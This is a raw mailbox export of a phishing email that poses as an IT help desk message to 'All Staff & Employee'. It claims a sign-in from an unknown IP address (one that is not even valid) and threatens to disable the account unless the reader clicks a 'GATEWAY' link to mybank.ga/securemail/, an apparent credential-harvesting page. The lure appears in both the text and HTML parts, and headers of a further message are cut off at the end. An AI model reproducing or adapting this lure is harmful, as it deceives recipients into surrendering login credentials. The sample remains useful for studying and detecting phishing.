From: "Woods, J. Joanne" <jjwoods@gov.bm>
To: "Woods, J. Joanne" <jjwoods@gov.bm>
Subject: RE: Help Desk Support Team
Thread-Topic: Help Desk Support Team
Thread-Index: AdOxUWD1oOhQT/DyRSWApKuxjdqtcgADA13QAAB1jaA=
Date: Thu, 1 Mar 2018 14:12:12 +0000
Message-ID: <A15C7B23FF8EB14EBB989F35120C3EC90179EDBFD2@CPSR-MBX-ITO112.gov.bm>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [105.112.96.209]
Content-Type: multipart/alternative; 
    boundary="_000_A15C7B23FF8EB14EBB989F35120C3EC90179EDBFD2CPSRMBXITO112_"
MIME-Version: 1.0
x-msw-jemd-newsletter: false
x-msw-jemd-refid: [2]zqmbdoxz1dsd79jefyfxbyodhhidqzosw6wji36k5p9tofe9a8x.spbed78o11zybi3pn4w1adyysnt1umk9barhex9x53ffdzt95bqimbh8g9kb8gk.zmb4qqyh5raocyc37r41gncdx79y4qwrhkyru8qnrjoi93xuqyek4bqo-lbl8.mailshell.net-223.238.255.100,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:29,LUA_SUMMARY:none;newsletter:no;phishing:no
x-msw-jemd-refid: [1]50,0,0,,d41d8cd98f00b204,jjwoods@gov.bm,,RULES_HIT:1:2:10:41:72:355:379:582:599:960:962:967:973:983:988:989:1021:1029:1152:1189:1208:1221:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1561:1575:1588:1589:1592:1594:1691:1714:1730:1776:1792:2525:2526:2527:2528:2561:2564:2610:2682:2685:2693:2859:2890:2902:2915:2917:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3866:3867:3868:3870:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4051:4250:4321:4379:4552:5007:6117:6248:6658:6659:6678:7688:7903:8583:8603:8957:9025:9080:9082:9149:9163:9165:9388:9868:10004:10026:10049:10128:10197:10214:10346:10919:11473:11656:11658:11875:12043:12438:12519:12551:12555:12657:12661:12895:12903:12986:13005:13017:13018:13019:13139:13163:13229:13237:13439:13893:14096:14659:21080:21326:21364:21433:21450:21451:21483:21499:21605:21627:30001:30003:30021:30054:30069,0,RBL:04ygopxp9zp8
Status: O
X-Status: 
X-Keywords:                  
X-UID: 438

--_000_A15C7B23FF8EB14EBB989F35120C3EC90179EDBFD2CPSRMBXITO112_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable



All Staff & Employee



Your Account was recently signed in by Unknown IP address: 103.740.110.128,=
 kindly GATEWAY<https://mybank.ga/securemail/> to log out of other Unknown =
IP and verify your e-mail account or your e-mail will be automatically disa=
ble for sending more messages.



Help Desk Support Team

























































































**********************************************************************

This email and its attachments ("email") contains confidential information =
intended solely for the recipient.  Unless you are the recipient, this emai=
l cannot be used, copied, stored, printed or disclosed either partially or =
in its entirety.   All copies should be deleted if you have received this e=
mail in error.  No liability is accepted for damage due to the opening of t=
his email.  It is your responsibility to take appropriate precautions to sa=
feguard your computer systems and networks.

**********************************************************************

--_000_A15C7B23FF8EB14EBB989F35120C3EC90179EDBFD2CPSRMBXITO112_
Content-Type: text/html; charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable

<html xmlns:v=3D"urn:schemas-microsoft-com:vml" xmlns:o=3D"urn:schemas-micr=
osoft-com:office:office" xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" xmlns=3D"http:=
//www.w3.org/TR/REC-html40">
<head>
<META http-equiv=3D"Content-Type" content=3D"text/html; charset=3DISO-8859-=
1">
<meta name=3D"Generator" content=3D"Microsoft Word 15 (filtered medium)">
<style><!--
/* Font Definitions */
@font-face
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
	{font-family:"Segoe UI";
	panose-1:2 11 5 2 4 2 4 2 2 3;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0in;
	margin-bottom:.0001pt;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
a:link, span.MsoHyperlink
	{mso-style-priority:99;
	color:#0563C1;
	text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
	{mso-style-priority:99;
	color:#954F72;
	text-decoration:underline;}
p.msonormal0, li.msonormal0, div.msonormal0
	{mso-style-name:msonormal;
	mso-margin-top-alt:auto;
	margin-right:0in;
	mso-margin-bottom-alt:auto;
	margin-left:0in;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
span.EmailStyle18
	{mso-style-type:personal;
	font-family:"Calibri",sans-serif;
	color:windowtext;}
span.EmailStyle19
	{mso-style-type:personal;
	font-family:"Calibri",sans-serif;
	color:windowtext;}
span.EmailStyle22
	{mso-style-type:personal-reply;
	font-family:"Calibri",sans-serif;
	color:windowtext;}
.MsoChpDefault
	{mso-style-type:export-only;
	font-size:10.0pt;}
@page WordSection1
	{size:8.5in 11.0in;
	margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
	{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext=3D"edit">
<o:idmap v:ext=3D"edit" data=3D"1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang=3D"EN-US" link=3D"#0563C1" vlink=3D"#954F72">
<div class=3D"WordSection1">
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p style=3D"margin:0in;margin-bottom:.0001pt;background:white"><strong><spa=
n style=3D"font-size:11.5pt;font-family:&quot;Calibri&quot;,sans-serif;colo=
r:black">All Staff &amp; Employee</span></strong><span style=3D"font-size:1=
1.5pt;font-family:&quot;Segoe UI&quot;,sans-serif;color:#212121"><o:p></o:p=
></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt;background:white;font-variant-=
ligatures: normal;font-variant-caps: normal;orphans: 2;text-align:start;wid=
ows: 2;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-d=
ecoration-color: initial;word-spacing:0px">
<span style=3D"font-size:12.0pt;font-family:&quot;Segoe UI&quot;,sans-serif=
;color:#212121">&nbsp;</span><span style=3D"font-size:11.5pt;font-family:&q=
uot;Segoe UI&quot;,sans-serif;color:#212121"><o:p></o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt;background:white;font-variant-=
ligatures: normal;font-variant-caps: normal;orphans: 2;text-align:start;wid=
ows: 2;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-d=
ecoration-color: initial;word-spacing:0px">
<span style=3D"font-size:12.0pt;font-family:&quot;Segoe UI&quot;,sans-serif=
;color:black">Your Account was recently signed in by Unknown IP address: 10=
3.740.110.128, kindly&nbsp;</span><strong><u><span style=3D"font-size:12.0p=
t;font-family:&quot;Calibri&quot;,sans-serif;color:#006FC9;font-weight:norm=
al"><a href=3D"https://mybank.ga/securemail/" target=3D"_blank"><b>GATEWAY<=
/b></a></span></u></strong><span style=3D"font-size:12.0pt;font-family:&quo=
t;Segoe UI&quot;,sans-serif;color:black">&nbsp;to
 log out of other&nbsp;Unknown&nbsp;IP&nbsp;and verify your e-mail account =
or your e-mail will be automatically disable for sending more messages.</sp=
an><span style=3D"font-size:11.5pt;font-family:&quot;Segoe UI&quot;,sans-se=
rif;color:#212121"><o:p></o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt;background:white;font-variant-=
ligatures: normal;font-variant-caps: normal;orphans: 2;text-align:start;wid=
ows: 2;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-d=
ecoration-color: initial;word-spacing:0px">
<span style=3D"font-size:12.0pt;font-family:&quot;Segoe UI&quot;,sans-serif=
;color:black">&nbsp;</span><span style=3D"font-size:11.5pt;font-family:&quo=
t;Segoe UI&quot;,sans-serif;color:#212121"><o:p></o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt;background:white;font-variant-=
ligatures: normal;font-variant-caps: normal;orphans: 2;text-align:start;wid=
ows: 2;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-d=
ecoration-color: initial;word-spacing:0px">
<span style=3D"font-size:12.0pt;font-family:&quot;Segoe UI&quot;,sans-serif=
;color:black">Help Desk Support Team</span><span style=3D"font-size:11.5pt;=
font-family:&quot;Segoe UI&quot;,sans-serif;color:#212121"><o:p></o:p></spa=
n></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
=0A<p>*********************************************************************=
*</p><p class=3D"MsoNormal"><span style=3D"color: rgb(31, 73, 125);">This e=
mail and its attachments=0A(&quot;email&quot;) contains confidential inform=
ation intended solely for the=0Arecipient.=A0 Unless you are the recipient,=
 this email cannot be used,=0Acopied, stored, printed or disclosed either p=
artially or in its=0Aentirety.=A0=A0 All copies should be deleted if you ha=
ve received this=0Aemail in error.=A0 No liability is accepted for damage d=
ue to the opening of this email.=A0 It is your responsibility to take appro=
priate=0Aprecautions to safeguard your computer systems and networks.</span=
></p><p class=3D"MsoNormal">***********************************************=
***********************</p>=0A=0A=0A=0A=0A=0A=0A</body>
</html>

--_000_A15C7B23FF8EB14EBB989F35120C3EC90179EDBFD2CPSRMBXITO112_--

From jose@monkey.org Fri Mar  2 14:42:32 2018 +0000
Return-Path: prvs=1599217f23=diane.gould@oregon.gov
Delivered-To: jose@monkey.org
X-FDA: 73898035344.01.war72_6d61887ccea29
X-Spam-Summary: 50,0,0,ace6b8b0cc6b73bf,d41d8cd98f00b204,prvs=1599217f23=diane.gould@oregon.gov,:diane.gould@oregon.gov,RULES_HIT:10:41:72:355:379:582:599:960:962:967:983:988:989:1152:1189:1208:1221:1260:1313:1314:1345:1359:1381:1431:1436:1437:1516:1517:1518:1535:1543:1561:1575:1588:1589:1592:1594:1711:1714:1730:1749:1776:1792:2525:2527:2561:2564:2682:2685:2693:2859:2890:2915:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3586:3866:3867:3868:3870:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4250:4552:5007:6117:6261:6650:6659:6678:6703:7903:8583:8603:8634:8957:9025:9080:9165:10004:10346:10400:11473:11656:11658:11788:11914:12043:12519:12551:12555:12657:12661:12903:12986:13019:13139:13163:13229:13237:13439:14096:14659:14721:14828:14885:21080:21433:21450:21451:21483:21605:21627:30001:30003:30021:30054:30069,0,RBL:159.121.109.42:@oregon.gov:.lbl8.mailshell.net-62.34.0.100 64.100.201.100,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF
X-HE-Tag: war72_6d61887ccea29
X-Filterd-Recvd-Size: 5790
Received: from mail2.state.or.us (mail2.state.or.us [159.121.109.42])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri,  2 Mar 2018 14:42:31 +0000 (UTC)
Received: from ASPAM2.ets.oregon.gov (aspam2.entss.or.gov [198.177.17.224])
	by mail2.state.or.us  with ESMTP id w22EdM4R014001-w22EdM4V014001
	(version=TLSv1.2 cipher=ECDHE-RSA-AES256-SHA bits=256 verify=OK);
	Fri, 2 Mar 2018 06:39:23 -0800
Received: from WPORGCHTL03.ENTSS.OR.GOV (WPORGCHTL03.ENTSS.OR.GOV [198.177.16.61])
	by ASPAM2.ets.oregon.gov  with ESMTP id w22EdLeH016750-w22EdLeJ016750
	(version=TLSv1.0 cipher=ECDHE-RSA-AES256-SHA bits=256 verify=CAFAIL);
	Fri, 2 Mar 2018 06:39:21 -0800
Received: from WPORGEXCL01.ENTSS.OR.GOV ([169.254.1.194]) by
 WPORGCHTL03.ENTSS.OR.GOV ([198.177.16.61]) with mapi id 14.03.0319.002; Fri,
 2 Mar 2018 06:39:20 -0800
